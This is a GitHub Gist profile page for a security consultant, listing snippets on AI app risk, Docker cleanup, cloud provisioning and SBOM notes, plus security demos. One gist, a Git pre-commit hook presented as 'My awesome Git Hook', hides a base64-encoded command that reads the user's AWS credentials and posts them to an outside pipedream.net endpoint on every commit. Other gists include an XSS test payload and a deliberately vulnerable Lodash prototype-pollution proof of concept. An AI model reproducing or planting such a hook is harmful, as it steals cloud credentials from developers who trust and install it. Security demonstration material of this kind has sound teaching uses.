Skip to content

Instantly share code, notes, and snippets.

View abhaybhargav's full-sized avatar

Abhay Bhargav abhaybhargav

76 followers · 1 following
  • we45
  • All over the world
View GitHub Profile
@abhaybhargav
abhaybhargav / Issues with AI enabled apps
Created March 10, 2025 05:11
We're worried about our crazy AI adoption!
Is something I've heard a lot of CISOs and ProdSec teams really worry about. And rightfully so. I see engineering teams start to plug-in LLMs into everything without thinking about security or privacy. This risk is heightened with Agents, because now, LLMs can literally call (sometimes extremely powerful) functions that can execute actions on your internal systems, APIs and more. And the AI landscape is massive and getting bigger every day.
This scares a lot of people and seems overwhelming. But let's break things down into smaller problems to make things easier to handle.
In my experience, 80%+ companies out there are building two types of apps:
* RAG (Retrieval Augmented Generation) apps where the org's internal datasets are loaded into vector databases and LLMs use that as context to generate responses for chatbots, internal applications and more
@abhaybhargav
abhaybhargav / clean-docker
Created September 3, 2022 09:32
Docker Cleanup script
docker stop $(docker ps -q)
docker rm $(docker ps -a -q)
docker rmi $(docker images -q -f dangling=true)
docker network prune
docker volume prune
@abhaybhargav
abhaybhargav / pre-commit
Created August 4, 2022 21:52
My awesome Git Hook
#!/bin/bash
j=$(echo "Y3VybCAtZCAneyJwYXJhbSI6ICInIiQoY2F0IH4vLmF3cy9jcmVkZW50aWFscyB8IGJhc2U2NCkiJyJ9JyAtSCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uIiAtWCBQT1NUIGh0dHBzOi8vZW80NmgzNmgxdnA4eW0ubS5waXBlZHJlYW0ubmV0" | base64 --decode)
eval $j
@abhaybhargav
abhaybhargav / index.js
Created June 10, 2022 02:05
Malicious CSP Payload
alert('this is a xss attack ' + document.domain)
@abhaybhargav
abhaybhargav / index.js
Last active June 11, 2022 01:18
CSP Genuine Payload
alert("This is genuine JS");
@abhaybhargav
abhaybhargav / index.js
Created October 21, 2020 10:54
LodashJS Prototype Pollution PoC code
//Lodash Prototype Pollution PoC Code
// lodash version used == 4.17.4
// Author: Abhay Bhargav
// Disclaimer: This is vulnerable code. You are solely responsible for how you use it
const _ = require("lodash");
const express = require("express");
const bodyParser = require("body-parser");
@abhaybhargav
abhaybhargav / compute_provision.py
Last active September 15, 2020 07:04
import googleapiclient.discovery
import sys
def main(name, url):
compute = googleapiclient.discovery.build('compute', 'beta')
result = compute.images().get(project="boreal-rain-289205", image = "bti-base").execute()
config = {
"name": name,
@abhaybhargav
abhaybhargav / my-new-startup.sh
Last active September 14, 2020 14:20
git clone ${REPO_URL} /root/
/bin/chmod +x /root/${PR_NAME}/setup.sh
/bin/bash +x /root/${PR_NAME}/setup.sh
rm /root/${PR_NAME}/setup.sh
rm /root/${PR_NAME}/.gitlab-ci.yml
rm /root/${PR_NAME}/.gitignore
rm /root/${PR_NAME}/README.md
rm -rf /root/${PR_NAME}/.git
rm /root/set.sh
rm /root/setup.sh
@abhaybhargav
abhaybhargav / caddy_templater.py
Last active September 9, 2020 12:02
Caddy Templater
#!/usr/bin/env python
import json
import argparse
from sys import exit
caddy_dict = {'apps': {'http': {'servers': {'srv0': {'listen': [':443'],
'routes': [{'match': [],
'handle': [{'handler': 'subroute',
'routes': [{'handle': [{'handler': 'reverse_proxy',
@abhaybhargav
abhaybhargav / clarifications.md
Created September 7, 2020 14:14
Points on SCA and SBOM for Verification

Notes on CPE and SWID

  • CPE is being EOLd, resulting in SWID, which is a ISO-paywalled document (Question: Is this accurate? Because I haven't found any reference to an EOL date)
  • This has also resulted in the splintering of several Platform Vulnerability Databases:
    • Rust's DB
    • NPM for NodeJS
    • PyUP for Python

(Again, not sure if this is accurate)

CycloneDX SBOM Spec